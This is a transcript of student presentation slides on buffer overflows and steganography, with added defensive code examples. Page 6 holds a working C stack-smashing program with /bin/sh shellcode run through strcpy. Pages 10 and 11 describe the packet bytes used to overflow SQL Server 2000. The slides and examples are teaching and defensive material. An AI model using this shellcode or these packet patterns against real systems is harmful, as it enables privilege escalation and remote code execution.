Buffer Overflow: A Short Study

BUFFER OVERFLOW: A SHORT STUDY Jonathan Hutchison Robert Lee Connor Mahoney Caleb Wherry

Transcript of Buffer Overflow: A Short Study

Page 1: Buffer Overflow: A Short Study

BUFFER OVERFLOW: A SHORT STUDY

Jonathan Hutchison, Robert Lee, Connor Mahoney, Caleb Wherry

Page 2: Buffer Overflow: A Short Study

Overview

Buffer Overflows: C/C++, SQL, Images

Steganography: Traditional, Digital

Page 3: Buffer Overflow: A Short Study

Basic Concepts

Buffer, Stack Memory, Heap Memory, Buffer Overflow, C/C++, SQL, Steganography

Page 4: Buffer Overflow: A Short Study

C/C++ Buffer Overflow Vulnerabilities

C/C++ On Older Linux Machines

Easiest to exploit. Few protections against segmentation faults. Many simple programs can cause serious damage on these machines.

Code Libraries

Untrusted libraries. Unstable functions. Unsecured error checking.

Page 5: Buffer Overflow: A Short Study

C/C++ Buffer Overflow Vulnerabilities (cont.)

Exploitation Using Shell Code: shell code and unstable C commands.

C Example: use of shell code to switch the user to "root"; use of the "strcpy()" function in C to cause a buffer overflow. Dangerous for someone running an unsecured Linux machine.

Page 6: Buffer Overflow: A Short Study

    #include <stdio.h>
    #include <string.h>

    // Shell code that will be executed once the buffer is overflowed.
    // It allows us to change the status of our login to "root".
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    char large_string[128];

    int main(int argc, char *argv[])
    {
        char buffer[96];                       // buffer to overflow
        int i;
        long *long_ptr = (long *)large_string;

        // These for loops take the shell code and translate it into the large
        // string, and in turn put the address of buffer into each pointer-sized
        // slot of large_string. (Assumes a 32-bit system, where 32 longs fill
        // the 128-byte string exactly.)
        for (i = 0; i < 32; i++)
            *(long_ptr + i) = (long)buffer;
        for (i = 0; i < (int)strlen(shellcode); i++)
            large_string[i] = shellcode[i];

        // The string copy function in C should be used with the utmost caution.
        // This is where the code blows up and causes the program to execute the
        // rest of the shell code on the command line.
        strcpy(buffer, large_string);
        return 0;
    }

Page 7: Buffer Overflow: A Short Study

Prevention of Buffer Overflow In C/C++

Use only trusted libraries when writing code.

Use updated software that helps prevent overflow.

Make sure your code checks the user input.

Use trusted programs, don’t use untested software.

Page 8: Buffer Overflow: A Short Study

Prevention of Buffer Overflow In C/C++ (cont.)

Administrative Point of View

Don't compromise quality for quantity. Don't rush deadlines.

Make sure your programmers are happy and comfortable. Working conditions matter.

Error checking for all inputs is a must. Don't cut corners.

Use software such as Flawfinder and Viega's RATS to find possible code problems.
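As an added example (not code from the slides), the Page 6 strcpy() pattern is shown beside a bounded copy that checks the input against the target before copying; the 96-byte buffer and 128-byte source sizes are taken from the slides' program.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides.  Sizes match the Page 6 program:
 * a 96-byte target buffer and a 128-byte source string. */
#define BUF_SIZE 96

/* Unchecked copy, as on Page 6: strcpy() stops only at the NUL byte, so any
 * source longer than BUF_SIZE - 1 characters writes past the end of buffer. */
void copy_unchecked(char *buffer, const char *src)
{
    strcpy(buffer, src);   /* no length check at all */
}

/* Checked copy: look for the terminator only within buffer_size bytes, so an
 * unterminated input cannot make us read past it; reject anything that does
 * not fit together with its NUL, and only then copy.
 * Returns 0 on success and -1 when the input was rejected. */
int copy_checked(char *buffer, size_t buffer_size, const char *src)
{
    const char *end = memchr(src, '\0', buffer_size);   /* scans at most buffer_size */
    if (end == NULL)                                    /* no room for src plus the NUL */
        return -1;
    size_t n = (size_t)(end - src);
    memcpy(buffer, src, n + 1);                         /* n characters plus terminator */
    return 0;
}

int main(void)
{
    char buffer[BUF_SIZE];
    char large_string[128];                 /* constructed input: 127 'A's */
    memset(large_string, 'A', sizeof large_string - 1);
    large_string[sizeof large_string - 1] = '\0';

    if (copy_checked(buffer, sizeof buffer, large_string) != 0)
        printf("rejected: %zu-byte input does not fit a %d-byte buffer\n",
               strlen(large_string), BUF_SIZE);
    if (copy_checked(buffer, sizeof buffer, "hello") == 0)
        printf("accepted: \"%s\"\n", buffer);
    return 0;
}
```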

Page 9: Buffer Overflow: A Short Study

Buffer Overflow In SQL

SQL – Structured Query Language: popular query language for relational database management.

In 2002, a Buffer Overflow vulnerability was discovered in Microsoft SQL Server 2000.

Both Stack based and Heap based attacks.

Attacks carried out through UDP port 1434, the SQL Monitor Port, commonly used by legitimate clients attempting to connect.

Single byte packet, set to 0x02.

Page 10: Buffer Overflow: A Short Study

Stack Based Buffer Overflow Attack

First byte set to 0x04

Instructs SQL monitor to open registry key

If followed by a large number of bytes, stack based buffer is overflowed.

Return address overwritten

Redirects SQL server process to execute code of the attacker's choice.

Page 11: Buffer Overflow: A Short Study

Heap Based Buffer Overflow Attack

Carried out using a similar technique: first byte set to 0x08, followed by a message with a certain format. Formatted properly, the attack avoids access violation errors before the heap is overflowed.

Vulnerability in SQL Server 2000 code: return values not validated; unhandled exceptions. Current process fails, resulting effectively in a denial of service attack.
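As an added example (not from the slides), a defender's first-byte triage of UDP/1434 datagrams following Pages 9 to 11: a one-byte 0x02 ping is normal, a short 0x04 request is an ordinary instance lookup, a 0x04 opcode with a large payload matches the stack overflow pattern, and 0x08 matches the heap pattern. The LARGE_PAYLOAD threshold is an assumption; the slides give no figure.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides.  LARGE_PAYLOAD is an assumed threshold
 * for "a large number of bytes"; the slides give no figure. */
#define LARGE_PAYLOAD 64

enum ssrp_verdict {
    SSRP_PING,           /* single byte 0x02: normal client discovery */
    SSRP_SHORT_REQUEST,  /* 0x04 with a short payload: ordinary instance lookup */
    SSRP_STACK_SUSPECT,  /* 0x04 followed by a large payload: Page 10 pattern */
    SSRP_HEAP_SUSPECT,   /* 0x08 opcode: Page 11 pattern */
    SSRP_OTHER           /* empty, malformed, or an opcode the slides do not cover */
};

enum ssrp_verdict classify_ssrp(const unsigned char *pkt, size_t len)
{
    if (len == 0)
        return SSRP_OTHER;
    switch (pkt[0]) {
    case 0x02:
        return len == 1 ? SSRP_PING : SSRP_OTHER;   /* the ping is exactly one byte */
    case 0x04:
        return len > LARGE_PAYLOAD ? SSRP_STACK_SUSPECT : SSRP_SHORT_REQUEST;
    case 0x08:
        return SSRP_HEAP_SUSPECT;
    default:
        return SSRP_OTHER;
    }
}

/* Count how many datagrams in a capture deserve an alert. */
size_t count_suspects(const unsigned char *const *pkts, const size_t *lens, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        enum ssrp_verdict v = classify_ssrp(pkts[i], lens[i]);
        if (v == SSRP_STACK_SUSPECT || v == SSRP_HEAP_SUSPECT)
            hits++;
    }
    return hits;
}

int main(void)
{
    /* Constructed datagrams: a ping, a short lookup, an oversized 0x04 payload. */
    unsigned char ping[] = { 0x02 };
    unsigned char lookup[] = { 0x04, 'M', 'S', 'S', 'Q', 'L' };
    unsigned char big[200];
    big[0] = 0x04;
    memset(big + 1, 'A', sizeof big - 1);
    const unsigned char *pkts[] = { ping, lookup, big };
    size_t lens[] = { sizeof ping, sizeof lookup, sizeof big };
    printf("%zu of 3 datagrams flagged\n", count_suspects(pkts, lens, 3));
    return 0;
}
```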

Page 12: Buffer Overflow: A Short Study

Buffer Overflow In Images

iPhone: www.jailbreakme.com

Alter file header in TIFF image

New memory pointer

Crashes browser

Unlocks file system

Page 13: Buffer Overflow: A Short Study

Other exploits

Windows: JPEG (GDI+ API), BMP, GIF

Linux: PNG

Macintosh, iPhone, & PSP: TIFF

Page 14: Buffer Overflow: A Short Study

Traditional Steganography

Image from a laser printer under 10x magnification

Page 15: Buffer Overflow: A Short Study

Traditional Steganography (cont.)

Page 16: Buffer Overflow: A Short Study

Digital Steganography

How it works

Each pixel has 24 bits for 3 colors (255 shades/color).

Change 1 or 2 color bits every pixel. Adds up quickly.

Bits can be encoded & decoded with a program.

No quality or size difference.

Applies to images, video, and audio.

Page 17: Buffer Overflow: A Short Study

Detection and Prevention

Compare with an original by checksum

Check same color pixels for different values

Statistical analysis

Algorithm detection

Compression & formatting
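As an added example (not from the slides) covering both the "How it works" list on Page 16 and the "compare with an original" check above, the code below hides one message bit in the low bit of each 8-bit colour channel, reads it back, and then compares the result against the untouched original, counting how many channel bytes changed and how many changed only in the low bit. The cover is a constructed byte array standing in for decoded image data.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides.  A pixel is three channel bytes (R, G, B);
 * one message bit goes into the low bit of each channel byte. */

/* Hide msg_len bytes in the low bits of successive channel bytes.
 * Returns 0 on success, -1 if the cover has too few channel bytes. */
int lsb_embed(uint8_t *cover, size_t cover_len, const uint8_t *msg, size_t msg_len)
{
    if (msg_len > cover_len / 8)
        return -1;
    for (size_t i = 0; i < msg_len * 8; i++) {
        uint8_t bit = (msg[i / 8] >> (7 - i % 8)) & 1;  /* most significant bit first */
        cover[i] = (uint8_t)((cover[i] & 0xFE) | bit);  /* value moves by at most 1 */
    }
    return 0;
}

/* Read msg_len bytes back out of the low bits. */
void lsb_extract(const uint8_t *stego, uint8_t *out, size_t msg_len)
{
    memset(out, 0, msg_len);
    for (size_t i = 0; i < msg_len * 8; i++)
        out[i / 8] = (uint8_t)((out[i / 8] << 1) | (stego[i] & 1));
}

/* Detection with the original at hand: count channel bytes that differ and how
 * many differ only in the low bit, the signature of LSB hiding.  A checksum
 * mismatch only says "changed"; this says "changed how". */
size_t lsb_diff(const uint8_t *orig, const uint8_t *stego, size_t len, size_t *lsb_only)
{
    size_t diff = 0;
    *lsb_only = 0;
    for (size_t i = 0; i < len; i++) {
        if (orig[i] == stego[i])
            continue;
        diff++;
        if ((orig[i] ^ stego[i]) == 0x01)
            (*lsb_only)++;
    }
    return diff;
}

int main(void)
{
    uint8_t orig[48], stego[48], out[2];          /* 16 pixels: room for 6 bytes */
    for (size_t i = 0; i < sizeof orig; i++)      /* constructed "image" data */
        orig[i] = (uint8_t)(i * 37 + 11);
    memcpy(stego, orig, sizeof orig);
    lsb_embed(stego, sizeof stego, (const uint8_t *)"hi", 2);
    lsb_extract(stego, out, 2);
    size_t lsb_only, diff = lsb_diff(orig, stego, sizeof orig, &lsb_only);
    printf("recovered %c%c; %zu bytes changed, %zu only in the low bit\n",
           out[0], out[1], diff, lsb_only);
    return 0;
}
```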

Page 18: Buffer Overflow: A Short Study

Example

Original image / Hidden image